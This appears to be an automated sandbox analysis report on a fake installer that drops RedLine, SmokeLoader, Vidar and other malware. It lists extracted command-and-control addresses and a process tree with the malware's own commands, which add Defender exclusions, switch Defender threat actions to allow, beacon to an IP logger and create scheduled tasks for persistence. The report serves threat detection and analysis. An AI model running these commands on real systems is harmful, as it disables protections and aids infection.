Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
72s -
max time network
628s -
platform
windows11_x64 -
resource
win11 -
submitted
20-09-2021 04:42
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
redline
janesam
65.108.20.195:6774
Extracted
smokeloader
2020
http://venerynnet1.top/
http://kevonahira2.top/
http://vegangelist3.top/
http://kingriffaele4.top/
http://arakeishant5.top/
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5384 5240 rundll32.exe 118 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4524 5240 rundll32.exe 118 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6700 5240 rundll32.exe 118 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral4/memory/1452-330-0x0000000001100000-0x000000000111D000-memory.dmp family_redline behavioral4/memory/2256-478-0x0000000005100000-0x0000000005718000-memory.dmp family_redline behavioral4/memory/4180-551-0x00000000054B0000-0x0000000005AC8000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral4/files/0x000100000002b1bb-174.dat family_socelars behavioral4/files/0x000100000002b1bb-217.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 2344 created 716 2344 powershell.exe 105 -
resource yara_rule behavioral4/memory/5348-542-0x0000000000600000-0x0000000000B77000-memory.dmp evasion -
resource yara_rule behavioral4/memory/4180-551-0x00000000054B0000-0x0000000005AC8000-memory.dmp redline -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral4/memory/916-296-0x0000000000A80000-0x0000000000B54000-memory.dmp family_vidar behavioral4/memory/6004-565-0x0000000000810000-0x00000000008E4000-memory.dmp family_vidar -
resource yara_rule behavioral4/files/0x000100000002b1b2-154.dat aspack_v212_v242 behavioral4/files/0x000200000002b1ac-161.dat aspack_v212_v242 behavioral4/files/0x000200000002b1ac-160.dat aspack_v212_v242 behavioral4/files/0x000100000002b1b4-158.dat aspack_v212_v242 behavioral4/files/0x000200000002b1ac-155.dat aspack_v212_v242 behavioral4/files/0x000100000002b1b2-156.dat aspack_v212_v242 behavioral4/files/0x000100000002b1b4-162.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
pid Process 4340 setup_installer.exe 3972 setup_install.exe 4180 Sun1917b8fb5f09db8.exe 1012 Sun191101c1aaa.exe 916 Sun19eb40faaaa9.exe 716 Sun19de8ff4b6aefeb8.exe 476 Sun19e4ade31b2a.exe 784 Sun1908b94df837b3158.exe 1452 Sun195a1614ec24e6a.exe 1456 Sun198361825f4.exe 1692 Sun1966fb31dd5a07.exe 1472 Sun19262b9e49ad.exe 1640 Sun193fda712d9f1.exe 1492 Sun1905815e51282417.exe 3888 Sun1966fb31dd5a07.tmp 4124 Ze2ro.exe 3400 1c9wYHECEkzOBY922GmHoy8t.exe 4268 3777470.scr 472 LzmwAqmV.exe -
Loads dropped DLL 7 IoCs
pid Process 3972 setup_install.exe 3972 setup_install.exe 3972 setup_install.exe 3972 setup_install.exe 3972 setup_install.exe 3972 setup_install.exe 3888 Sun1966fb31dd5a07.tmp -
resource yara_rule behavioral4/files/0x000100000002b1f2-298.dat themida behavioral4/files/0x000100000002b1f2-306.dat themida behavioral4/files/0x000100000002b1f1-305.dat themida behavioral4/files/0x000100000002b1eb-303.dat themida behavioral4/files/0x000100000002b1f1-295.dat themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 ipinfo.io 36 ipinfo.io 84 ipinfo.io 142 ipinfo.io 1 ip-api.com 1 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
pid pid_target Process procid_target 5316 716 WerFault.exe 105 5232 916 WerFault.exe 108 5424 784 WerFault.exe 96 2932 6132 WerFault.exe 160 5172 5884 WerFault.exe 133 5600 5884 WerFault.exe 133 416 1472 WerFault.exe 101 4748 2928 WerFault.exe 157 2160 3880 WerFault.exe 172 5444 2928 WerFault.exe 157 5432 3880 WerFault.exe 172 4848 4952 WerFault.exe 143 3196 5512 WerFault.exe 125 5992 6004 WerFault.exe 141 832 1616 WerFault.exe 161 6016 5204 WerFault.exe 217 1704 5204 WerFault.exe 217 6096 4940 WerFault.exe 149 6076 3168 WerFault.exe 262 4448 3168 WerFault.exe 262 5668 2392 WerFault.exe 267 6352 3480 WerFault.exe 266 408 6636 WerFault.exe 295 7152 4456 WerFault.exe 288 5764 956 WerFault.exe 328 6336 6396 WerFault.exe 371 6612 1464 WerFault.exe 385 1448 3200 WerFault.exe 381 -
NSIS installer 2 IoCs
resource yara_rule behavioral4/files/0x000100000002b1f0-299.dat nsis_installer_1 behavioral4/files/0x000100000002b1f0-299.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4644 schtasks.exe 4352 schtasks.exe 5040 schtasks.exe 2016 schtasks.exe 5188 schtasks.exe 1540 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1556 timeout.exe 1920 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 7024 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe 4180 ZpCav6AHlUZ7u_7tNQlhZx07.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeCreateTokenPrivilege 1472 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 1472 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 1472 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 1472 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 1472 Sun19262b9e49ad.exe Token: SeTcbPrivilege 1472 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 1472 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 1472 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 1472 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 1472 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 1472 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 1472 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 1472 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 1472 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 1472 Sun19262b9e49ad.exe Token: SeBackupPrivilege 1472 Sun19262b9e49ad.exe Token: SeRestorePrivilege 1472 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 1472 Sun19262b9e49ad.exe Token: SeDebugPrivilege 1472 Sun19262b9e49ad.exe Token: SeAuditPrivilege 1472 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 1472 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 1472 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 1472 Sun19262b9e49ad.exe Token: SeUndockPrivilege 1472 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 1472 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 1472 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 1472 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 1472 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 1472 Sun19262b9e49ad.exe Token: 31 1472 Sun19262b9e49ad.exe Token: 32 1472 Sun19262b9e49ad.exe Token: 33 1472 Sun19262b9e49ad.exe Token: 34 1472 Sun19262b9e49ad.exe Token: 35 1472 Sun19262b9e49ad.exe Token: SeDebugPrivilege 1012 Sun191101c1aaa.exe Token: SeDebugPrivilege 476 Sun19e4ade31b2a.exe Token: SeDebugPrivilege 1780 powershell.exe Token: SeDebugPrivilege 1452 Sun195a1614ec24e6a.exe Token: SeDebugPrivilege 1456 Sun198361825f4.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4784 wrote to memory of 4340 4784 setup_x86_x64_install.exe 77 PID 4784 wrote to memory of 4340 4784 setup_x86_x64_install.exe 77 PID 4784 wrote to memory of 4340 4784 setup_x86_x64_install.exe 77 PID 4340 wrote to memory of 3972 4340 setup_installer.exe 78 PID 4340 wrote to memory of 3972 4340 setup_installer.exe 78 PID 4340 wrote to memory of 3972 4340 setup_installer.exe 78 PID 3972 wrote to memory of 5056 3972 setup_install.exe 82 PID 3972 wrote to memory of 5056 3972 setup_install.exe 82 PID 3972 wrote to memory of 5056 3972 setup_install.exe 82 PID 3972 wrote to memory of 780 3972 setup_install.exe 83 PID 3972 wrote to memory of 780 3972 setup_install.exe 83 PID 3972 wrote to memory of 780 3972 setup_install.exe 83 PID 3972 wrote to memory of 1292 3972 setup_install.exe 84 PID 3972 wrote to memory of 1292 3972 setup_install.exe 84 PID 3972 wrote to memory of 1292 3972 setup_install.exe 84 PID 3972 wrote to memory of 3444 3972 setup_install.exe 85 PID 3972 wrote to memory of 3444 3972 setup_install.exe 85 PID 3972 wrote to memory of 3444 3972 setup_install.exe 85 PID 3972 wrote to memory of 3284 3972 setup_install.exe 95 PID 3972 wrote to memory of 3284 3972 setup_install.exe 95 PID 3972 wrote to memory of 3284 3972 setup_install.exe 95 PID 3972 wrote to memory of 4084 3972 setup_install.exe 88 PID 3972 wrote to memory of 4084 3972 setup_install.exe 88 PID 3972 wrote to memory of 4084 3972 setup_install.exe 88 PID 3972 wrote to memory of 4968 3972 setup_install.exe 86 PID 3972 wrote to memory of 4968 3972 setup_install.exe 86 PID 3972 wrote to memory of 4968 3972 setup_install.exe 86 PID 3972 wrote to memory of 3844 3972 setup_install.exe 87 PID 3972 wrote to memory of 3844 3972 setup_install.exe 87 PID 3972 wrote to memory of 3844 3972 setup_install.exe 87 PID 3972 wrote to memory of 5116 3972 setup_install.exe 89 PID 3972 wrote to memory of 5116 3972 setup_install.exe 89 PID 3972 wrote to memory of 5116 3972 setup_install.exe 89 PID 3972 wrote to memory of 4540 3972 setup_install.exe 94 PID 3972 wrote to memory of 4540 3972 setup_install.exe 94 PID 3972 wrote to memory of 4540 3972 setup_install.exe 94 PID 3972 wrote to memory of 3164 3972 setup_install.exe 93 PID 3972 wrote to memory of 3164 3972 setup_install.exe 93 PID 3972 wrote to memory of 3164 3972 setup_install.exe 93 PID 3972 wrote to memory of 580 3972 setup_install.exe 92 PID 3972 wrote to memory of 580 3972 setup_install.exe 92 PID 3972 wrote to memory of 580 3972 setup_install.exe 92 PID 3972 wrote to memory of 836 3972 setup_install.exe 91 PID 3972 wrote to memory of 836 3972 setup_install.exe 91 PID 3972 wrote to memory of 836 3972 setup_install.exe 91 PID 780 wrote to memory of 4180 780 cmd.exe 90 PID 780 wrote to memory of 4180 780 cmd.exe 90 PID 780 wrote to memory of 4180 780 cmd.exe 90 PID 5116 wrote to memory of 916 5116 cmd.exe 108 PID 5116 wrote to memory of 916 5116 cmd.exe 108 PID 5116 wrote to memory of 916 5116 cmd.exe 108 PID 3844 wrote to memory of 1012 3844 cmd.exe 107 PID 3844 wrote to memory of 1012 3844 cmd.exe 107 PID 4968 wrote to memory of 716 4968 cmd.exe 105 PID 4968 wrote to memory of 716 4968 cmd.exe 105 PID 4968 wrote to memory of 716 4968 cmd.exe 105 PID 3284 wrote to memory of 476 3284 cmd.exe 106 PID 3284 wrote to memory of 476 3284 cmd.exe 106 PID 4084 wrote to memory of 784 4084 cmd.exe 96 PID 4084 wrote to memory of 784 4084 cmd.exe 96 PID 4084 wrote to memory of 784 4084 cmd.exe 96 PID 580 wrote to memory of 1452 580 cmd.exe 103 PID 580 wrote to memory of 1452 580 cmd.exe 103 PID 580 wrote to memory of 1452 580 cmd.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:5056
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
PID:4180 -
C:\Users\Admin\Documents\1c9wYHECEkzOBY922GmHoy8t.exe"C:\Users\Admin\Documents\1c9wYHECEkzOBY922GmHoy8t.exe"6⤵
- Executes dropped EXE
PID:3400
-
-
C:\Users\Admin\Documents\ZpCav6AHlUZ7u_7tNQlhZx07.exe"C:\Users\Admin\Documents\ZpCav6AHlUZ7u_7tNQlhZx07.exe"6⤵PID:5268
-
C:\Users\Admin\Documents\ZpCav6AHlUZ7u_7tNQlhZx07.exeC:\Users\Admin\Documents\ZpCav6AHlUZ7u_7tNQlhZx07.exe7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4180
-
-
-
C:\Users\Admin\Documents\sem9lVoLkR16iVlBd2YOuTQp.exe"C:\Users\Admin\Documents\sem9lVoLkR16iVlBd2YOuTQp.exe"6⤵PID:5256
-
C:\Users\Admin\Documents\sem9lVoLkR16iVlBd2YOuTQp.exe"C:\Users\Admin\Documents\sem9lVoLkR16iVlBd2YOuTQp.exe"7⤵PID:804
-
-
-
C:\Users\Admin\Documents\xYV28N5U9pzZUbXQGEGui0KO.exe"C:\Users\Admin\Documents\xYV28N5U9pzZUbXQGEGui0KO.exe"6⤵PID:5372
-
-
C:\Users\Admin\Documents\UUtq4WjJ4BarAXynxAb_ugs9.exe"C:\Users\Admin\Documents\UUtq4WjJ4BarAXynxAb_ugs9.exe"6⤵PID:5360
-
-
C:\Users\Admin\Documents\ZtYWYMVWwCSTMXCgy3B2TPkK.exe"C:\Users\Admin\Documents\ZtYWYMVWwCSTMXCgy3B2TPkK.exe"6⤵PID:5348
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\ZtYWYMVWwCSTMXCgy3B2TPkK.exe"7⤵PID:7052
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:1556
-
-
-
-
C:\Users\Admin\Documents\ykA8wZ5Q2HHnDffeIuePKSmw.exe"C:\Users\Admin\Documents\ykA8wZ5Q2HHnDffeIuePKSmw.exe"6⤵PID:5336
-
C:\Users\Admin\Documents\ykA8wZ5Q2HHnDffeIuePKSmw.exeC:\Users\Admin\Documents\ykA8wZ5Q2HHnDffeIuePKSmw.exe7⤵PID:2256
-
-
-
C:\Users\Admin\Documents\HGAIiSERd9J5UYxYB_dh_jM4.exe"C:\Users\Admin\Documents\HGAIiSERd9J5UYxYB_dh_jM4.exe"6⤵PID:5512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 2807⤵
- Program crash
PID:3196
-
-
-
C:\Users\Admin\Documents\VN5HAYDAotNnUt3AOnQx415q.exe"C:\Users\Admin\Documents\VN5HAYDAotNnUt3AOnQx415q.exe"6⤵PID:5452
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵PID:2508
-
C:\Users\Admin\AppData\Local\Temp\f.exe"f.exe"8⤵PID:2592
-
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"8⤵PID:2248
-
-
C:\Users\Admin\AppData\Local\Temp\wwl.exe"wwl.exe"8⤵PID:2988
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵PID:4320
-
-
-
-
C:\Users\Admin\Documents\2wKReNkUNs2Swmc7OdJsqPIm.exe"C:\Users\Admin\Documents\2wKReNkUNs2Swmc7OdJsqPIm.exe"6⤵PID:5644
-
-
C:\Users\Admin\Documents\XJULreo6h2Ec3ai8XNIsjmNG.exe"C:\Users\Admin\Documents\XJULreo6h2Ec3ai8XNIsjmNG.exe"6⤵PID:6004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 2367⤵
- Program crash
PID:5992
-
-
-
C:\Users\Admin\Documents\cw3HoRIkpyXr6St89Vt1VnSi.exe"C:\Users\Admin\Documents\cw3HoRIkpyXr6St89Vt1VnSi.exe"6⤵PID:4952
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2407⤵
- Program crash
PID:4848
-
-
-
C:\Users\Admin\Documents\pwzkXDh3c2ZE4rgeetJ8Cnyz.exe"C:\Users\Admin\Documents\pwzkXDh3c2ZE4rgeetJ8Cnyz.exe"6⤵PID:6124
-
-
C:\Users\Admin\Documents\6VzMJRQX1WY0TZSH2a9NmLcM.exe"C:\Users\Admin\Documents\6VzMJRQX1WY0TZSH2a9NmLcM.exe"6⤵PID:4940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 2447⤵
- Program crash
PID:6096
-
-
-
C:\Users\Admin\Documents\nnA_VDtuorz5rcBA7asLVSxW.exe"C:\Users\Admin\Documents\nnA_VDtuorz5rcBA7asLVSxW.exe"6⤵PID:5264
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:1540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:4644
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵PID:5276
-
C:\Users\Admin\Documents\UYjzZisKnWTKb0Kjz5J51Myf.exe"C:\Users\Admin\Documents\UYjzZisKnWTKb0Kjz5J51Myf.exe"8⤵PID:5416
-
-
C:\Users\Admin\Documents\EYISAlJEvSKHK0ihmXr7KUxx.exe"C:\Users\Admin\Documents\EYISAlJEvSKHK0ihmXr7KUxx.exe"8⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\7zSC734.tmp\Install.exe.\Install.exe9⤵PID:5684
-
C:\Users\Admin\AppData\Local\Temp\7zSDED3.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵PID:6176
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵PID:3100
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:6916
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:4184
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:3952
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:5204
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:5468
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:4508
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2344 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:5000
-
-
-
-
-
